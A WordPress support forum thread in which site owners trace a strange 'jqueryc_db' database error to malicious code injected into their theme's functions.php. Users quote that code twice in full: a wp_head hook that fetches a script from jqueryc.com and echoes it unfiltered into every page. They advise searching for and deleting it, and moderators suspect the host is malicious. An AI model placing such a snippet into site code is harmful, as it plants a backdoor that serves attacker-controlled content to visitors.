• pleevi.com is my website. when i click on a post there, this code pops up at the top. any idea what is causing it and how to fix it?
    thanks
    Couldn’t connect to database server.Couldn’t find database jqueryc_db.An unexpected problem has occured with the application.
    SELECT statscurl_id, linkgroup_id FROM statscurl WHERE statscurl_ip = ‘184.173.199.222’ LIMIT 1;

Viewing 15 replies - 1 through 15 (of 23 total)
  • Thread Starter whos that

    (@whos-that)

    if there is any more info that i need to provide, just tell me

    I am having the same problem on my website and Need HELP badly.
    Thanks

    URL = http://www.wirelessnewsplus.com

    That’s not a standard WordPress DB table or query, so I’d say that there’s a plugin that’s making that call. It looks like it’s a statistics plugin, and it has either not installed correctly or it’s just not set up right. If you can’t tell which one it is, try disableing all of your plugins and re-enableing them one-b-one until you see which one is causing that error.

    deactivating jet pack wordpress plugin solved the problem with both of my sites.

    Thread Starter whos that

    (@whos-that)

    i do not have jet pack wordpress enabled but i do have
    CloudFlare
    Lazy Load
    Plugin Organizer
    WP-Optimize
    WP Smush.it
    Cimy User Extra Fields
    Global Hide/Remove Admin Bar Plugin
    All in One SEO Pack
    SEO Smart Links
    WP Robots Txt
    W3 Total Cache

    i will post as soon as i find out the problem so hopefully that will help other people with the same problem. thanks for the help so far

    I didn’t have Jetpack and I deactivated every plugin and the problem persist. Seems to show up after the 4th click of any one of the Navigation menus on both my sites.

    I have Cloudflare
    WP-Smush.it
    DB Manager
    W3 Total Cache
    and Few more .

    Please, let me know if you find a solution and I will do same.
    There was a suggestion earlier by one of the WP Gurus, that moving the website to another server will solve the problem, but my webhost didn’t think so.

    Thread Starter whos that

    (@whos-that)

    hmm, i have disabled all the plugins but i still see it. any other problems?

    I have the same problem, i’ve not jet pack.

    Mhhh have you templatic theme?

    SAME HERE!

    “Couldn’t connect to database server.Couldn’t find database jqueryc_db.An unexpected problem has occured with the application.
    SELECT statscurl_id, linkgroup_id FROM statscurl WHERE statscurl_ip = ‘46.252.158.14’ LIMIT 1; “

    plugin:
    bbPress
    BP Profile Search
    Breadcrumbs Everywhere
    BuddyPress
    Events Manager
    White Label CMS

    everithing is updated

    Seems a query to an external site…

    This should solve the problem.

    I detected that it was my template (theme). in functions.php in the first lines I found this

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 15;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

    Delete them and all should be fine. Worked for me on my two websites

    Download your all site via ftp and search this key word ‘jqueryc’
    you will get code like this

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

    simply delete it , save your file and re upload it on its destination …..
    hope this willl solve the isse….

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    I’ve pinged some folks more knowledgable than myself (oh yeah, that’s not hard… πŸ˜‰ ) but I think that jqueryc .com is malicious.

    Can you share the link to where you got that theme? If it’s what I think it is then you should delete that theme right now.

    What do you think it is- That Stuff hijacked my websites for a whole day

    Moderator Ipstenu (Mika Epstein)

    (@ipstenu)

    πŸ³οΈβ€πŸŒˆ Advisor and Activist

    We’d need to know more about the theme πŸ™‚

    What’s the name and where’d you get it?

    (Also please learn to use the code tags. There’s a button above the text entry box, it helps us read your code πŸ˜‰ )

Viewing 15 replies - 1 through 15 (of 23 total)
  • The topic ‘Couldn't find database jqueryc_db help’ is closed to new replies.